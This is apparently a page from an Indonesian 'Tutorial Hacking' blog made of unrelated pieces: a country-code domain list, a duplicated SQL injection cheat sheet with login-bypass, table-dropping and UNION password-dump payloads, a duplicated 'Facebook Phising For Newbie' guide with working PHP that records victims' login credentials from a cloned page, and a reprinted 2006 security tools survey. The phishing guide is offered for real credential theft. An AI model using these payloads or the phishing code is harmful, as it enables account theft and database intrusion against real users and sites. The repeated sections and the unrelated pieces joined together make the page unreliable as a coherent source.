A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan
B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia *
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi *
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia *
.br – Brasil *
.bs – Bahama *
.bt – Bhutan
.bv – Pulau Bouvet (tidak dipakai dan tidak terdaftar)
.bw – Botswana
.by – Belarus
.bz – Belize *
C
.ca – Kanada
.cc – Pulau Cocos *
.cd – Republik Demokratik Kongo (dulunya .zr – Zaire) *
.cf – Republik Afrika Tengah
.cg – Republik Kongo *
.ch – Swiss *
.ci – Côte d’Ivoire (Pantai Gading)
.ck – Kepulauan Cook *
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok *
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro (dulunya .yu – Yugoslavia; Catatan: pada tanggal 3 Juni, 2006, Montenegro mendeklarasikan kemerdekaannya, sehingga domain ini tidak dipakai lagi.) (kode domain .cs tidak dipakai, tidak ada DNS) (kode domain .cs dulunya dipakai untuk Cekoslowakia)
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal *
.cy – Siprus
.cz – Republik Ceko
D
.de – Jerman
.dj – Djibouti *
.dk – Denmark *
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)
E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat (tidak dipakai; tidak ada DNS)
.er – Eritrea
.es – Spanyol *
.et – Ethiopia
.eu – Uni Eropa (kode domain yang "dikhususkan" oleh ISO 3166-1)
F
.fi – Finlandia
.fj – Fiji *
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia *
.fo – Kepulauan Faroe
.fr – Perancis
G
.ga – Gabon
.gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland *
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani *
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan *
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana
H
.hk – Hong Kong *
.hm – Pulau Heard dan Kepulauan McDonald *
.hn – Honduras *
.hr – Kroasia
.ht – Haiti
.hu – Hongaria *
I
.id – Indonesia
.ie – Republik Irlandia
.il – Israel *
.im – Pulau Man *
.in – India *
.io – Teritorial Britania di Samudra Hindia *
.iq – Irak
.ir – Iran *
.is – Islandia
.it – Italia
J
.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang
K
.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara (tidak dipakai; tidak ada DNS)
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan *
L
.la – Laos *
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein *
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia *
.ly – Libya *
M
.ma – Maroko
.mc – Monako
.md – Moldova *
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia *
.mo – Makau
.mp – Kepulauan Mariana Utara *
.mq – Martinique
.mr – Mauritania
.ms – Montserrat *
.mt – Malta
.mu – Mauritius *
.mv – Maladewa
.mw – Malawi *
.mx – Meksiko *
.my – Malaysia
.mz – Mozambik
N
.na – Namibia *
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk *
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda * (ccTLD terdaftar pertama)
.no – Norwegia
.np – Nepal
.nr – Nauru *
.nu – Niue *
.nz – Selandia Baru *
O
.om – Oman
P
.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina *
.pk – Pakistan *
.pl – Polandia *
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn *
.pr – Puerto Riko *
.ps – Otoritas Nasional Palestina *
.pt – Portugal *
.pw – Palau
.py – Paraguay
Q
.qa – Qatar
R
.re – Réunion
.ro – Rumania *
.rs – Serbia
.ru – Rusia *
.rw – Rwanda
S
.sa – Arab Saudi
.sb – Kepulauan Solomon *
.sc – Seychelles *
.sd – Sudan
.se – Swedia *
.sg – Singapura
.sh – Saint Helena *
.si – Slovenia
.sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino *
.sn – Senegal
.so – Somalia *
.sr – Suriname *
.st – Sao Tome dan Principe *
.su – Uni Soviet (terdepresiasi; digantikan; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
.sv – El Salvador
.sy – Suriah *
.sz – Swaziland *
T
.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo *
.th – Thailand
.tj – Tajikistan *
.tk – Tokelau *
.tl – Timor Leste (dulunya .tp) *
.tm – Turkmenistan *
.tn – Tunisia
.to – Tonga *
.tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
.tr – Turki
.tt – Trinidad dan Tobago *
.tv – Tuvalu *
.tw – Republik China (Taiwan) *
.tz – Tanzania
U
.ua – Ukraina
.ug – Uganda *
.uk – Inggris (kode domain yang "dikhususkan" oleh ISO 3166-1) (lihat pula .gb)
.us – Amerika Serikat *
.uy – Uruguay
.uz – Uzbekistan
V
.va – Vatikan
.vc – Saint Vincent dan Grenadines *
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya *
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu *
W
.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat) *
Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia (kemudian berganti nama menjadi Serbia dan Montenegro)
(kode domain secara resmi digantikan oleh .cs (lihat di atas) namun tetap dipakai; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
Z
.za – Afrika Selatan *
.zm – Zambia
.zw – Zimbabwe
Tidak bersponsor
.biz .com .edu .gov .info .int .mil .name .net .org
Bersponsor
.aero .cat .coop .jobs .mobi .museum .pro .tel .travel
Infrastruktur
.arpa .root
Startup phase
.asia
Diusulkan
.berlin .bzh .cym .gal .geo .kid .kids .mail .nyc .post .sco .web .xxx
Dihapus
.nato
Dipesan
.example .invalid .localhost .test
Pseudo-domain
.bitnet .csnet .ip .local .onion .uucp
Simple SQL Injection Advance
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
Facebook Phising For Newbie
Diposting oleh
Ray Sparkz (AXXERX55)
di
21.44
Sabtu, 21 Agustus 2010
Label:
Tutorial Hacking
5
komentar
Today we are going to make a phisher for facebook.
1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:
10) now save it as lol.php and remember the save as file type to all files.
11) now, make a new file in notepad, dont write anything, save it as: passwords.txt
12) now upload all of them in http://yourhosting.com
1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:
<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
10) now save it as lol.php and remember the save as file type to all files.
11) now, make a new file in notepad, dont write anything, save it as: passwords.txt
12) now upload all of them in http://yourhosting.com
Hacker Tools
WINDOWS
More Info With http://www.hacker-soft.net/
[Passwords] Windows Password Reset Professional 8.0 |
[Programming] WinGuard Pro 2010 Lite 7.5 |
[Access Control] Win Control 2007 7.400 |
[Passwords] Project Password 1.3 |
[Passwords] ThunderbirdPassDecryptor 1.0 |
[Encryption] Kotak 1.0 |
[Passwords] Atomic Zip Password Cracker 2.60 |
[Scanners] cvechecker-0.2 |
[Passwords] RoboForm Enterprise 7.0.66 Beta / 6.10.0 _________________________________________________________________________________ |
LINUX |
_________________________________________________________________________________ |
MAC OS X |
_________________________________________________________________________________ |
POCKET PC |
_________________________________________________________________________________ |
ASSESSMENT |
_________________________________________________________________________________ |
DEFENSE |
_________________________________________________________________________________ |
PAPERS |
_________________________________________________________________________________ |
MISCELLANEOUS |
Top 100 Network Security Tools
After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.
Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.
Each tool is described by one ore more attributes:
Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:
Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.
Each tool is described by one ore more attributes:
Did not appear on the 2003 list | |
/ | Popularity ranking rose / fell the given number since the 2003 survey |
Generally costs money. A free limited/demo/trial version may be available. | |
Works natively on Linux | |
Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants | |
Works natively on Apple Mac OS X | |
Works natively on Microsoft Windows | |
Features a command-line interface | |
Offers a GUI (point and click) interface | |
Source code available for inspection. |
#1 | Nessus : Premier UNIX vulnerability assessment tool Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. See all vulnerability scanners |
#2 | Wireshark : Sniffing the glue that holds the Internet together Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences). See all packet sniffers |
#3 | Snort : Everyone's favorite open source IDS This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts. Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort. See all intrusion detection systems |
#4 | Netcat : The network Swiss army knife This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact. Other takes on Netcat include OpenBSD's nc, Cryptcat, Netcat6, PNetcat, SBD, and so-called GNU Netcat. See all Netcats |
#5 | Metasploit Framework : Hack the Planet Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses. See all vulnerability exploitation tools |
#6 | Hping2 : A network probing utility like ping on steroids This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols. See all packet crafting tools |
#7 10 | Kismet : A powerful wireless sniffer Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ... See all wireless tools, and packet sniffers |
#8 3 | Tcpdump : The classic sniffer for network monitoring and data acquisition Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools. See all packet sniffers |
#9 23 | Cain and Abel : The top password recovery tool for Windows UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented. See all password crackers, and packet sniffers |
#10 1 | John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here. See all password crackers |
#11 2 | Ettercap : In case you still thought switched LANs provide much extra security Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN. See all packet sniffers |
#12 4 | Nikto : A more comprehensive web scanner Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected. See all web vulnerability scanners |
#13 | Ping/telnet/dig/traceroute/whois/netstat : The basics While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with Hping2 and Netcat. |
#14 2 | OpenSSH / PuTTY / SSH : A secure way to access remote computers SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin. Dozens of other free and proprietary clients exist. You can explore them here or here. |
#15 35 | THC Hydra : A Fast network authentication cracker which supports many different services When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC. See all password crackers |
#16 | Paros proxy : A web application vulnerability assessment proxy A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting. See all web vulnerability scanners |
#17 10 | Dsniff : A suite of powerful network auditing and penetration-testing tools This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs. See all packet sniffers |
#18 7 | NetStumbler : Free Windows 802.11 Sniffer Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC. See all wireless tools, and packet sniffers |
#19 18 | THC Amap : An application fingerprinting scanner Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC. See all application-specific scanners |
#20 12 | GFI LANguard : A commercial network security scanner for Windows GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days. See all vulnerability scanners |
#21 | Aircrack : The fastest available WEP/WPA cracking tool Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files). See all wireless tools, and password crackers |
#22 4 | Superscan : A Windows-only port scanner, pinger, and resolver SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois. See all port scanners |
#23 2 | Netfilter : The current Linux kernel packet filter/firewall Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see Openbsd PF (OpenBSD specific), or IP Filter. Many personal firewalls are available for Windows (Tiny,Zone Alarm, Norton, Kerio, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it. See all firewalls |
#24 | Sysinternals : An extensive collection of powerful windows utilities Sysinternals provides many small windows utilities that are quite useful for low-level windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with:
|
#25 5 | Retina : Commercial vulnerability assessment scanner by eEye Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research. See all vulnerability scanners |
|
Langganan:
Postingan (Atom)